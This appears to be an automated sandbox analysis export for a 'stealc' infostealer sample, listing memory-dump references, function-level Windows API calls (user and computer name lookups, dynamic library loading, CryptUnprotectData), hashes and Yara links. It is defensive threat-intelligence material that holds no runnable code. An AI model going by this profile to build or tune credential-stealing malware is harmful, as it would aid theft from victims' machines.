Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 2d46e6abcb7b2388ab599b454f2a3a7cdcd35a6fb15d0b854e3913b251cd1303
Instruction ID: cf8b032838055e76742eaf36853608c51c6b3b8cf545c12b7d6f3c4f9123a7a9
Opcode Fuzzy Hash: 2d46e6abcb7b2388ab599b454f2a3a7cdcd35a6fb15d0b854e3913b251cd1303
Instruction Fuzzy Hash: 8211B7B8A00209EFCB04DF98D985AAE77B5FF88300F1045A8E915A7354D774AE51CFA1

Function 00F27A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01780DF8,00000000,?,00F30E10,00000000,?,00000000,00000000), ref: 00F27A63
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,01780DF8,00000000,?,00F30E10,00000000,?,00000000,00000000,?), ref: 00F27A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01780DF8,00000000,?,00F30E10,00000000,?,00000000,00000000,?), ref: 00F27A7D
wsprintfA.USER32 ref: 00F27AB7

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 28d426b6e6004c3dc64c3594766fbef5d3ddcaaac0417a594055069d33ed6344
Instruction ID: 1c06b4faf84ee778095bf66b703838e449a7869620a50e3a2e9622ef95183a80
Opcode Fuzzy Hash: 28d426b6e6004c3dc64c3594766fbef5d3ddcaaac0417a594055069d33ed6344
Instruction Fuzzy Hash: 9B1182B1945328EBDB249B54EC55F59B778FB44721F1043A6E516932C0C7745A40CF51

Function 00F278E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F26A2B), ref: 00F27910
HeapAlloc.KERNEL32(00000000,?,?,?,00F26A2B), ref: 00F27917
GetComputerNameA.KERNEL32(?,00000104), ref: 00F2792F

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 87ff3a9e68279ed522eb9359d639ee1e3da280021aa2154cace5ac63fdefc2d3
Instruction ID: 4e106d3d5e1bd2ed1c051bc0ea513b9c43c8ba42495ad737135349d97f532257
Opcode Fuzzy Hash: 87ff3a9e68279ed522eb9359d639ee1e3da280021aa2154cace5ac63fdefc2d3
Instruction Fuzzy Hash: 1401A9B1944304EFC714DF95E945BAFBBB8FB04B21F10422AF655E3380C77459408BA1

Function 00F27850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F111B7), ref: 00F27880
HeapAlloc.KERNEL32(00000000,?,?,?,00F111B7), ref: 00F27887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F2789F

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: cfaad80cac50564cf33f0c45cf30e487cd6ebee0cb85515b0c3db20dfa6b3626
Instruction ID: 6deb0bedce4878accd91432f5e64ac025683a672dd50de5e9c762e28148eaa66
Opcode Fuzzy Hash: cfaad80cac50564cf33f0c45cf30e487cd6ebee0cb85515b0c3db20dfa6b3626
Instruction Fuzzy Hash: E4F04FB1944208EBC714DF98E949BAEBBB8FB08711F10026AFA15A3680C77555448BA1

Function 00F11160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00F26A17,00F30AEF), ref: 00F1116A
ExitProcess.KERNEL32 ref: 00F1117E

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: a407d66f0c0cdf94fb74d1253b55b2d9b979585a3a547c254a9a829ee8ae824b
Instruction ID: 23876c9b941972e3e4b70b9544d12e2a470e10d0707ee6b71be1486aa040bdec
Opcode Fuzzy Hash: a407d66f0c0cdf94fb74d1253b55b2d9b979585a3a547c254a9a829ee8ae824b
Instruction Fuzzy Hash: F4D01774940308DBCB149AA0A8496DDBB78FB08211F000668D91662240EA3164C18BA5

Function 00F29C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01778588), ref: 00F29C2D
GetProcAddress.KERNEL32(74DD0000,017785A8), ref: 00F29C45
GetProcAddress.KERNEL32(74DD0000,01773CF0), ref: 00F29C5E
GetProcAddress.KERNEL32(74DD0000,01773D68), ref: 00F29C76
GetProcAddress.KERNEL32(74DD0000,01773FC0), ref: 00F29C8E
GetProcAddress.KERNEL32(74DD0000,01773F60), ref: 00F29CA7
GetProcAddress.KERNEL32(74DD0000,0177B7E0), ref: 00F29CBF
GetProcAddress.KERNEL32(74DD0000,01773F30), ref: 00F29CD7
GetProcAddress.KERNEL32(74DD0000,01773F00), ref: 00F29CF0
GetProcAddress.KERNEL32(74DD0000,01773F78), ref: 00F29D08
GetProcAddress.KERNEL32(74DD0000,01773F90), ref: 00F29D20
GetProcAddress.KERNEL32(74DD0000,017786E8), ref: 00F29D39
GetProcAddress.KERNEL32(74DD0000,01778708), ref: 00F29D51
GetProcAddress.KERNEL32(74DD0000,017785C8), ref: 00F29D69
GetProcAddress.KERNEL32(74DD0000,017785E8), ref: 00F29D82
GetProcAddress.KERNEL32(74DD0000,01773FA8), ref: 00F29D9A
GetProcAddress.KERNEL32(74DD0000,01773F18), ref: 00F29DB2
GetProcAddress.KERNEL32(74DD0000,0177B970), ref: 00F29DCB
GetProcAddress.KERNEL32(74DD0000,01778608), ref: 00F29DE3
GetProcAddress.KERNEL32(74DD0000,01773F48), ref: 00F29DFB
GetProcAddress.KERNEL32(74DD0000,01780230), ref: 00F29E14
GetProcAddress.KERNEL32(74DD0000,017800F8), ref: 00F29E2C
GetProcAddress.KERNEL32(74DD0000,01780110), ref: 00F29E44
GetProcAddress.KERNEL32(74DD0000,01778628), ref: 00F29E5D
GetProcAddress.KERNEL32(74DD0000,017800B0), ref: 00F29E75
GetProcAddress.KERNEL32(74DD0000,01780380), ref: 00F29E8D
GetProcAddress.KERNEL32(74DD0000,017801B8), ref: 00F29EA6
GetProcAddress.KERNEL32(74DD0000,01780188), ref: 00F29EBE
GetProcAddress.KERNEL32(74DD0000,01780218), ref: 00F29ED6
GetProcAddress.KERNEL32(74DD0000,01780098), ref: 00F29EEF
GetProcAddress.KERNEL32(74DD0000,017801D0), ref: 00F29F07
GetProcAddress.KERNEL32(74DD0000,01780248), ref: 00F29F1F
GetProcAddress.KERNEL32(74DD0000,01780308), ref: 00F29F38
GetProcAddress.KERNEL32(74DD0000,01774BB0), ref: 00F29F50
GetProcAddress.KERNEL32(74DD0000,01780260), ref: 00F29F68
GetProcAddress.KERNEL32(74DD0000,01780170), ref: 00F29F81
GetProcAddress.KERNEL32(74DD0000,01778728), ref: 00F29F99
GetProcAddress.KERNEL32(74DD0000,01780368), ref: 00F29FB1
GetProcAddress.KERNEL32(74DD0000,01778668), ref: 00F29FCA
GetProcAddress.KERNEL32(74DD0000,017801E8), ref: 00F29FE2
GetProcAddress.KERNEL32(74DD0000,01780278), ref: 00F29FFA
GetProcAddress.KERNEL32(74DD0000,01778088), ref: 00F2A013
GetProcAddress.KERNEL32(74DD0000,017780A8), ref: 00F2A02B
LoadLibraryA.KERNEL32(01780350,?,00F25CA3,?,00000034,00000064,00F26600,?,0000002C,00000064,00F265A0,?,00000030,00000064,Function_00015AD0,?), ref: 00F2A03D
LoadLibraryA.KERNEL32(01780290,?,00F25CA3,?,00000034,00000064,00F26600,?,0000002C,00000064,00F265A0,?,00000030,00000064,Function_00015AD0,?), ref: 00F2A04E
LoadLibraryA.KERNEL32(01780320,?,00F25CA3,?,00000034,00000064,00F26600,?,0000002C,00000064,00F265A0,?,00000030,00000064,Function_00015AD0,?), ref: 00F2A060
LoadLibraryA.KERNEL32(017802A8,?,00F25CA3,?,00000034,00000064,00F26600,?,0000002C,00000064,00F265A0,?,00000030,00000064,Function_00015AD0,?), ref: 00F2A072
LoadLibraryA.KERNEL32(017800C8,?,00F25CA3,?,00000034,00000064,00F26600,?,0000002C,00000064,00F265A0,?,00000030,00000064,Function_00015AD0,?), ref: 00F2A083
LoadLibraryA.KERNEL32(017802D8,?,00F25CA3,?,00000034,00000064,00F26600,?,0000002C,00000064,00F265A0,?,00000030,00000064,Function_00015AD0,?), ref: 00F2A095
LoadLibraryA.KERNEL32(01780200,?,00F25CA3,?,00000034,00000064,00F26600,?,0000002C,00000064,00F265A0,?,00000030,00000064,Function_00015AD0,?), ref: 00F2A0A7
LoadLibraryA.KERNEL32(01780338,?,00F25CA3,?,00000034,00000064,00F26600,?,0000002C,00000064,00F265A0,?,00000030,00000064,Function_00015AD0,?), ref: 00F2A0B8
GetProcAddress.KERNEL32(75290000,017781A8), ref: 00F2A0DA
GetProcAddress.KERNEL32(75290000,017800E0), ref: 00F2A0F2
GetProcAddress.KERNEL32(75290000,0177DD58), ref: 00F2A10A
GetProcAddress.KERNEL32(75290000,01780128), ref: 00F2A123
GetProcAddress.KERNEL32(75290000,01778168), ref: 00F2A13B
GetProcAddress.KERNEL32(734C0000,0177B948), ref: 00F2A160
GetProcAddress.KERNEL32(734C0000,01778348), ref: 00F2A179
GetProcAddress.KERNEL32(734C0000,0177B9E8), ref: 00F2A191
GetProcAddress.KERNEL32(734C0000,017802C0), ref: 00F2A1A9
GetProcAddress.KERNEL32(734C0000,01780140), ref: 00F2A1C2
GetProcAddress.KERNEL32(734C0000,017783E8), ref: 00F2A1DA
GetProcAddress.KERNEL32(734C0000,017782C8), ref: 00F2A1F2
GetProcAddress.KERNEL32(734C0000,017802F0), ref: 00F2A20B
GetProcAddress.KERNEL32(752C0000,017780C8), ref: 00F2A22C
GetProcAddress.KERNEL32(752C0000,017780E8), ref: 00F2A244
GetProcAddress.KERNEL32(752C0000,01780158), ref: 00F2A25D
GetProcAddress.KERNEL32(752C0000,017801A0), ref: 00F2A275
GetProcAddress.KERNEL32(752C0000,017783C8), ref: 00F2A28D
GetProcAddress.KERNEL32(74EC0000,0177BA88), ref: 00F2A2B3
GetProcAddress.KERNEL32(74EC0000,0177BB00), ref: 00F2A2CB
GetProcAddress.KERNEL32(74EC0000,017803B0), ref: 00F2A2E3
GetProcAddress.KERNEL32(74EC0000,01778108), ref: 00F2A2FC
GetProcAddress.KERNEL32(74EC0000,01778068), ref: 00F2A314
GetProcAddress.KERNEL32(74EC0000,0177B8A8), ref: 00F2A32C
GetProcAddress.KERNEL32(75BD0000,01780398), ref: 00F2A352
GetProcAddress.KERNEL32(75BD0000,01778448), ref: 00F2A36A
GetProcAddress.KERNEL32(75BD0000,0177DDC8), ref: 00F2A382
GetProcAddress.KERNEL32(75BD0000,017803C8), ref: 00F2A39B
GetProcAddress.KERNEL32(75BD0000,017803E0), ref: 00F2A3B3
GetProcAddress.KERNEL32(75BD0000,017782E8), ref: 00F2A3CB
GetProcAddress.KERNEL32(75BD0000,01778368), ref: 00F2A3E4
GetProcAddress.KERNEL32(75BD0000,01780410), ref: 00F2A3FC
GetProcAddress.KERNEL32(75BD0000,01780458), ref: 00F2A414
GetProcAddress.KERNEL32(75A70000,01778388), ref: 00F2A436
GetProcAddress.KERNEL32(75A70000,017803F8), ref: 00F2A44E
GetProcAddress.KERNEL32(75A70000,01780440), ref: 00F2A466
GetProcAddress.KERNEL32(75A70000,01780428), ref: 00F2A47F
GetProcAddress.KERNEL32(75A70000,01780AB0), ref: 00F2A497
GetProcAddress.KERNEL32(75450000,01778328), ref: 00F2A4B8
GetProcAddress.KERNEL32(75450000,01778188), ref: 00F2A4D1
GetProcAddress.KERNEL32(75DA0000,017783A8), ref: 00F2A4F2
GetProcAddress.KERNEL32(75DA0000,01780930), ref: 00F2A50A
GetProcAddress.KERNEL32(6F070000,01778428), ref: 00F2A530
GetProcAddress.KERNEL32(6F070000,017781C8), ref: 00F2A548
GetProcAddress.KERNEL32(6F070000,01778248), ref: 00F2A560
GetProcAddress.KERNEL32(6F070000,01780B58), ref: 00F2A579
GetProcAddress.KERNEL32(6F070000,01778408), ref: 00F2A591
GetProcAddress.KERNEL32(6F070000,017781E8), ref: 00F2A5A9
GetProcAddress.KERNEL32(6F070000,01778128), ref: 00F2A5C2
GetProcAddress.KERNEL32(6F070000,01778148), ref: 00F2A5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00F2A5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00F2A607
GetProcAddress.KERNEL32(75AF0000,01780AC8), ref: 00F2A629
GetProcAddress.KERNEL32(75AF0000,0177DD48), ref: 00F2A641
GetProcAddress.KERNEL32(75AF0000,01780A50), ref: 00F2A659
GetProcAddress.KERNEL32(75AF0000,01780A98), ref: 00F2A672
GetProcAddress.KERNEL32(75D90000,01778228), ref: 00F2A693
GetProcAddress.KERNEL32(6F6F0000,01780AE0), ref: 00F2A6B4
GetProcAddress.KERNEL32(6F6F0000,01778208), ref: 00F2A6CD
GetProcAddress.KERNEL32(6F6F0000,017809C0), ref: 00F2A6E5
GetProcAddress.KERNEL32(6F6F0000,01780AF8), ref: 00F2A6FD

Strings

HttpQueryInfoA, xrefs: 00F2A5FC
InternetSetOptionA, xrefs: 00F2A5E5

Memory Dump Source

Source File: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000006.00000002.2612821951.0000000000F10000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613018438.0000000000F3B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F5A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F6A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F95000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F98000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000F9F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FCD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FF2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.0000000000FFF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000101F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000102B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010B5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010D5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2613116477.000000000115A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2614524264.000000000116C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f10000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 2507c4a8c4551fc4e61c014e4b11fa1c7544437ddbe1eed888e98f937340febe
Instruction ID: 9eff8302a043a296565f7948c72c4944abcd4474751ceddcb6fecd84aa8dc93a
Opcode Fuzzy Hash: 2507c4a8c4551fc4e61c014e4b11fa1c7544437ddbe1eed888e98f937340febe
Instruction Fuzzy Hash: 4D62EAB5590740EFC36CDBA8F5989563BF9FF8C602714873AA7268324CD63A94C1DB60

Function 00F17710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00F261C4,?), ref: 00F17724
RtlAllocateHeap.NTDLL(00000000,?,00F261C4,?), ref: 00F1772B
lstrcatA.KERNEL32(?,0177D018,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 00F178DB
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F178EF
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17903
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17917
lstrcatA.KERNEL32(?,01780F00,?,00F261C4,?), ref: 00F1792B
lstrcatA.KERNEL32(?,01780FA8,?,00F261C4,?), ref: 00F1793F
lstrcatA.KERNEL32(?,01781008,?,00F261C4,?), ref: 00F17952
lstrcatA.KERNEL32(?,01781050,?,00F261C4,?), ref: 00F17966
lstrcatA.KERNEL32(?,0177D0A0,?,00F261C4,?), ref: 00F1797A
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F1798E
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F179A2
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F179B6
lstrcatA.KERNEL32(?,01780F00,?,00F261C4,?), ref: 00F179C9
lstrcatA.KERNEL32(?,01780FA8,?,00F261C4,?), ref: 00F179DD
lstrcatA.KERNEL32(?,01781008,?,00F261C4,?), ref: 00F179F1
lstrcatA.KERNEL32(?,01781050,?,00F261C4,?), ref: 00F17A04
lstrcatA.KERNEL32(?,01781880,?,00F261C4,?), ref: 00F17A18
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17A2C
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17A40
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17A54
lstrcatA.KERNEL32(?,01780F00,?,00F261C4,?), ref: 00F17A68
lstrcatA.KERNEL32(?,01780FA8,?,00F261C4,?), ref: 00F17A7B
lstrcatA.KERNEL32(?,01781008,?,00F261C4,?), ref: 00F17A8F
lstrcatA.KERNEL32(?,01781050,?,00F261C4,?), ref: 00F17AA3
lstrcatA.KERNEL32(?,017818E8,?,00F261C4,?), ref: 00F17AB6
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17ACA
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17ADE
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17AF2
lstrcatA.KERNEL32(?,01780F00,?,00F261C4,?), ref: 00F17B06
lstrcatA.KERNEL32(?,01780FA8,?,00F261C4,?), ref: 00F17B1A
lstrcatA.KERNEL32(?,01781008,?,00F261C4,?), ref: 00F17B2D
lstrcatA.KERNEL32(?,01781050,?,00F261C4,?), ref: 00F17B41
lstrcatA.KERNEL32(?,01781950,?,00F261C4,?), ref: 00F17B55
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17B69
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17B7D
lstrcatA.KERNEL32(?,?,?,00F261C4,?), ref: 00F17B91
lstrcatA.KERNEL32(?,01780F00,?,00F261C4,?), ref: 00F17BA4
